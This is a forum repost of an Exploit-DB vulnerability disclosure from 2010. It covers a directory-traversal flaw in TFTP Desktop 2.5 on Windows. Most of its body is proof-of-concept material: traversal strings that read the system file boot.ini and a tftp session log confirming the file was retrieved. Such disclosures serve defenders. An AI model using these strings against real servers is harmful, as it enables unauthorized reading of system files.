- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 14857
- Проверка EDB
-
- Пройдено
- Автор
- CHR1X
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- N/A
- Дата публикации
- 2010-09-01
Код:
+------------------------------------------------------------------------+
| ....... |
| ..''xxxxxxxxxxxxxxx'... |
| ..'xxxxxxxxxxxxxxxxxxxxxxxxxxx.. |
| ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. |
| .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. |
| .'xxxxxxxxxxxxxxxxxxxxx''...... ... .. |
| .xxxxxxxxxxxxxxxxxx'... ........ .'. |
| 'xxxxxxxxxxxxxxx'...... '. |
| 'xxxxxxxxxxxxxx'..'x.. .x. |
| .xxxxxxxxxxxx'...'.. ... .' |
| 'xxxxxxxxx'.. . .. .x. |
| xxxxxxx'. .. x. |
| xxxx'. .... x x. |
| 'x'. ...'xxxxxxx'. x .x. |
| .x'. .'xxxxxxxxxxxxxx. '' .' |
| .xx. .'xxxxxxxxxxxxxxxx. .'xx'''. .' |
| .xx.. 'xxxxxxxxxxxxxxxx' .'xxxxxxxxx''. |
| .'xx'. .'xxxxxxxxxxxxxxx. ..'xxxxxxxxxxxx' |
| .xxx'. .xxxxxxxxxxxx'. .'xxxxxxxxxxxxxx'. |
| .xxxx'.'xxxxxxxxx'. xxx'xxxxxxxxxx'. |
| .'xxxxxxx'.... ...xxxxxxx'. |
| ..'xxxxx'.. ..xxxxx'.. |
| ....'xx'.....''''... |
| |
| CubilFelino Security Research Labs |
| proudly presents... |
+------------------------------------------------------------------------+
Author: chr1x ([email protected])
Date: August 30, 2010
Affected operating system/software, including full version details
TFTP Desktop version 2.5, Tested on Windows XP PRO SP3
Download:
http://www.mynet2.com/soft/Software%20Archive/TFTP%20Server/tftp_desktop_free.exe
How the vulnerability can be reproduced
Attack strings below:
[*] Testing Path: .../.../.../boot.ini <- Vulnerable string!!
[*] Testing Path: .../.../.../.../boot.ini <- Vulnerable string!!
[*] Testing Path: .../.../.../.../.../boot.ini <- Vulnerable string!!
[*] Testing Path: .../.../.../.../.../.../boot.ini <- Vulnerable string!!
[*] Testing Path: .../.../.../.../.../.../.../boot.ini <- Vulnerable string!!
[*] Testing Path: .../.../.../.../.../.../.../.../boot.ini <- Vulnerable string!!
[*] Testing Path: ...\...\...\boot.ini <- Vulnerable string!!
[*] Testing Path: ...\...\...\...\boot.ini <- Vulnerable string!!
[*] Testing Path: ...\...\...\...\...\boot.ini <- Vulnerable string!!
[*] Testing Path: ...\...\...\...\...\...\boot.ini <- Vulnerable string!!
[*] Testing Path: ...\...\...\...\...\...\...\boot.ini <- Vulnerable string!!
[*] Testing Path: ...\...\...\...\...\...\...\...\boot.ini <- Vulnerable string!!
Confirmation log:
root@olovely:/# tftp
tftp> connect
(to) 192.168.1.53
tftp> ascii
tftp> get
(files) .../.../.../.../.../.../boot.ini
Received 211 bytes in 0.0 seconds
tftp> quit
What impact the vulnerability has on the vulnerable system
* High, since when exploiting the vulnerability the attacker is able to get full access to the victim filesystem.
- Источник
- www.exploit-db.com